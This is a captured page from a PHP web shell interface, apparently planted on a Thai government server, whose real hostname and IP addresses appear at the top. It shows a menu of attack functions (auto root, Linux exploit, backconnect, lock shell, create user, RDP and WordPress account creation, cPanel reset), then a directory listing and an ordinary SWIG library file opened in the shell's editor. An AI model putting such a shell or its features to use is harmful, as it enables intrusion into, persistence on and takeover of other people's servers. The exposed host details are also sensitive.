Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
swig /
1.3.40 /
[ HOME SHELL ]
Name
Size
Permission
Action
allegrocl
[ DIR ]
drwxr-xr-x
cffi
[ DIR ]
drwxr-xr-x
chicken
[ DIR ]
drwxr-xr-x
clisp
[ DIR ]
drwxr-xr-x
csharp
[ DIR ]
drwxr-xr-x
gcj
[ DIR ]
drwxr-xr-x
guile
[ DIR ]
drwxr-xr-x
java
[ DIR ]
drwxr-xr-x
lua
[ DIR ]
drwxr-xr-x
modula3
[ DIR ]
drwxr-xr-x
mzscheme
[ DIR ]
drwxr-xr-x
ocaml
[ DIR ]
drwxr-xr-x
octave
[ DIR ]
drwxr-xr-x
perl5
[ DIR ]
drwxr-xr-x
php
[ DIR ]
drwxr-xr-x
pike
[ DIR ]
drwxr-xr-x
python
[ DIR ]
drwxr-xr-x
r
[ DIR ]
drwxr-xr-x
ruby
[ DIR ]
drwxr-xr-x
std
[ DIR ]
drwxr-xr-x
tcl
[ DIR ]
drwxr-xr-x
typemaps
[ DIR ]
drwxr-xr-x
uffi
[ DIR ]
drwxr-xr-x
allkw.swg
684
B
-rw-r--r--
attribute.i
655
B
-rw-r--r--
carrays.i
2.74
KB
-rw-r--r--
cdata.i
2.21
KB
-rw-r--r--
cmalloc.i
2.46
KB
-rw-r--r--
constraints.i
7.04
KB
-rw-r--r--
cpointer.i
3.63
KB
-rw-r--r--
cstring.i
486
B
-rw-r--r--
cwstring.i
427
B
-rw-r--r--
exception.i
7.21
KB
-rw-r--r--
intrusive_ptr.i
3.81
KB
-rw-r--r--
inttypes.i
2.73
KB
-rw-r--r--
math.i
2.2
KB
-rw-r--r--
pointer.i
456
B
-rw-r--r--
runtime.swg
1.21
KB
-rw-r--r--
shared_ptr.i
2.05
KB
-rw-r--r--
std_except.i
2.09
KB
-rw-r--r--
stdint.i
2.47
KB
-rw-r--r--
stl.i
411
B
-rw-r--r--
swig.swg
23.42
KB
-rw-r--r--
swigarch.i
1.7
KB
-rw-r--r--
swigerrors.swg
509
B
-rw-r--r--
swiginit.swg
7.91
KB
-rw-r--r--
swiglabels.swg
3.11
KB
-rw-r--r--
swigrun.i
418
B
-rw-r--r--
swigrun.swg
16.71
KB
-rw-r--r--
swigwarn.swg
11.75
KB
-rw-r--r--
swigwarnings.swg
6.83
KB
-rw-r--r--
wchar.i
471
B
-rw-r--r--
windows.i
4.2
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cpointer.i
/* ----------------------------------------------------------------------------- * See the LICENSE file for information on copyright, usage and redistribution * of SWIG, and the README file for authors - http://www.swig.org/release.html. * * cpointer.i * * SWIG library file containing macros that can be used to manipulate simple * pointer objects. * ----------------------------------------------------------------------------- */ /* ----------------------------------------------------------------------------- * %pointer_class(type,name) * * Places a simple proxy around a simple type like 'int', 'float', or whatever. * The proxy provides this interface: * * class type { * public: * type(); * ~type(); * type value(); * void assign(type value); * }; * * Example: * * %pointer_class(int, intp); * * int add(int *x, int *y) { return *x + *y; } * * In python (with proxies) * * >>> a = intp() * >>> a.assign(10) * >>> a.value() * 10 * >>> b = intp() * >>> b.assign(20) * >>> print add(a,b) * 30 * * As a general rule, this macro should not be used on class/structures that * are already defined in the interface. * ----------------------------------------------------------------------------- */ %define %pointer_class(TYPE, NAME) %{ typedef TYPE NAME; %} typedef struct { } NAME; %extend NAME { #ifdef __cplusplus NAME() { return new TYPE(); } ~NAME() { if (self) delete self; } #else NAME() { return (TYPE *) calloc(1,sizeof(TYPE)); } ~NAME() { if (self) free(self); } #endif } %extend NAME { void assign(TYPE value) { *self = value; } TYPE value() { return *self; } TYPE * cast() { return self; } static NAME * frompointer(TYPE *t) { return (NAME *) t; } } %types(NAME = TYPE); %enddef /* ----------------------------------------------------------------------------- * %pointer_functions(type,name) * * Create functions for allocating/deallocating pointers. This can be used * if you don't want to create a proxy class or if the pointer is complex. * * %pointer_functions(int, intp) * * int add(int *x, int *y) { return *x + *y; } * * In python (with proxies) * * >>> a = copy_intp(10) * >>> intp_value(a) * 10 * >>> b = new_intp() * >>> intp_assign(b,20) * >>> print add(a,b) * 30 * >>> delete_intp(a) * >>> delete_intp(b) * * ----------------------------------------------------------------------------- */ %define %pointer_functions(TYPE,NAME) %{ static TYPE *new_##NAME() { %} #ifdef __cplusplus %{ return new TYPE(); %} #else %{ return (TYPE *) calloc(1,sizeof(TYPE)); %} #endif %{} static TYPE *copy_##NAME(TYPE value) { %} #ifdef __cplusplus %{ return new TYPE(value); %} #else %{ TYPE *self = (TYPE *) calloc(1,sizeof(TYPE)); *self = value; return self; %} #endif %{} static void delete_##NAME(TYPE *self) { %} #ifdef __cplusplus %{ if (self) delete self; %} #else %{ if (self) free(self); %} #endif %{} static void NAME ##_assign(TYPE *self, TYPE value) { *self = value; } static TYPE NAME ##_value(TYPE *self) { return *self; } %} TYPE *new_##NAME(); TYPE *copy_##NAME(TYPE value); void delete_##NAME(TYPE *self); void NAME##_assign(TYPE *self, TYPE value); TYPE NAME##_value(TYPE *self); %enddef /* ----------------------------------------------------------------------------- * %pointer_cast(type1,type2,name) * * Generates a pointer casting function. * ----------------------------------------------------------------------------- */ %define %pointer_cast(TYPE1,TYPE2,NAME) %inline %{ TYPE2 NAME(TYPE1 x) { return (TYPE2) x; } %} %enddef
Close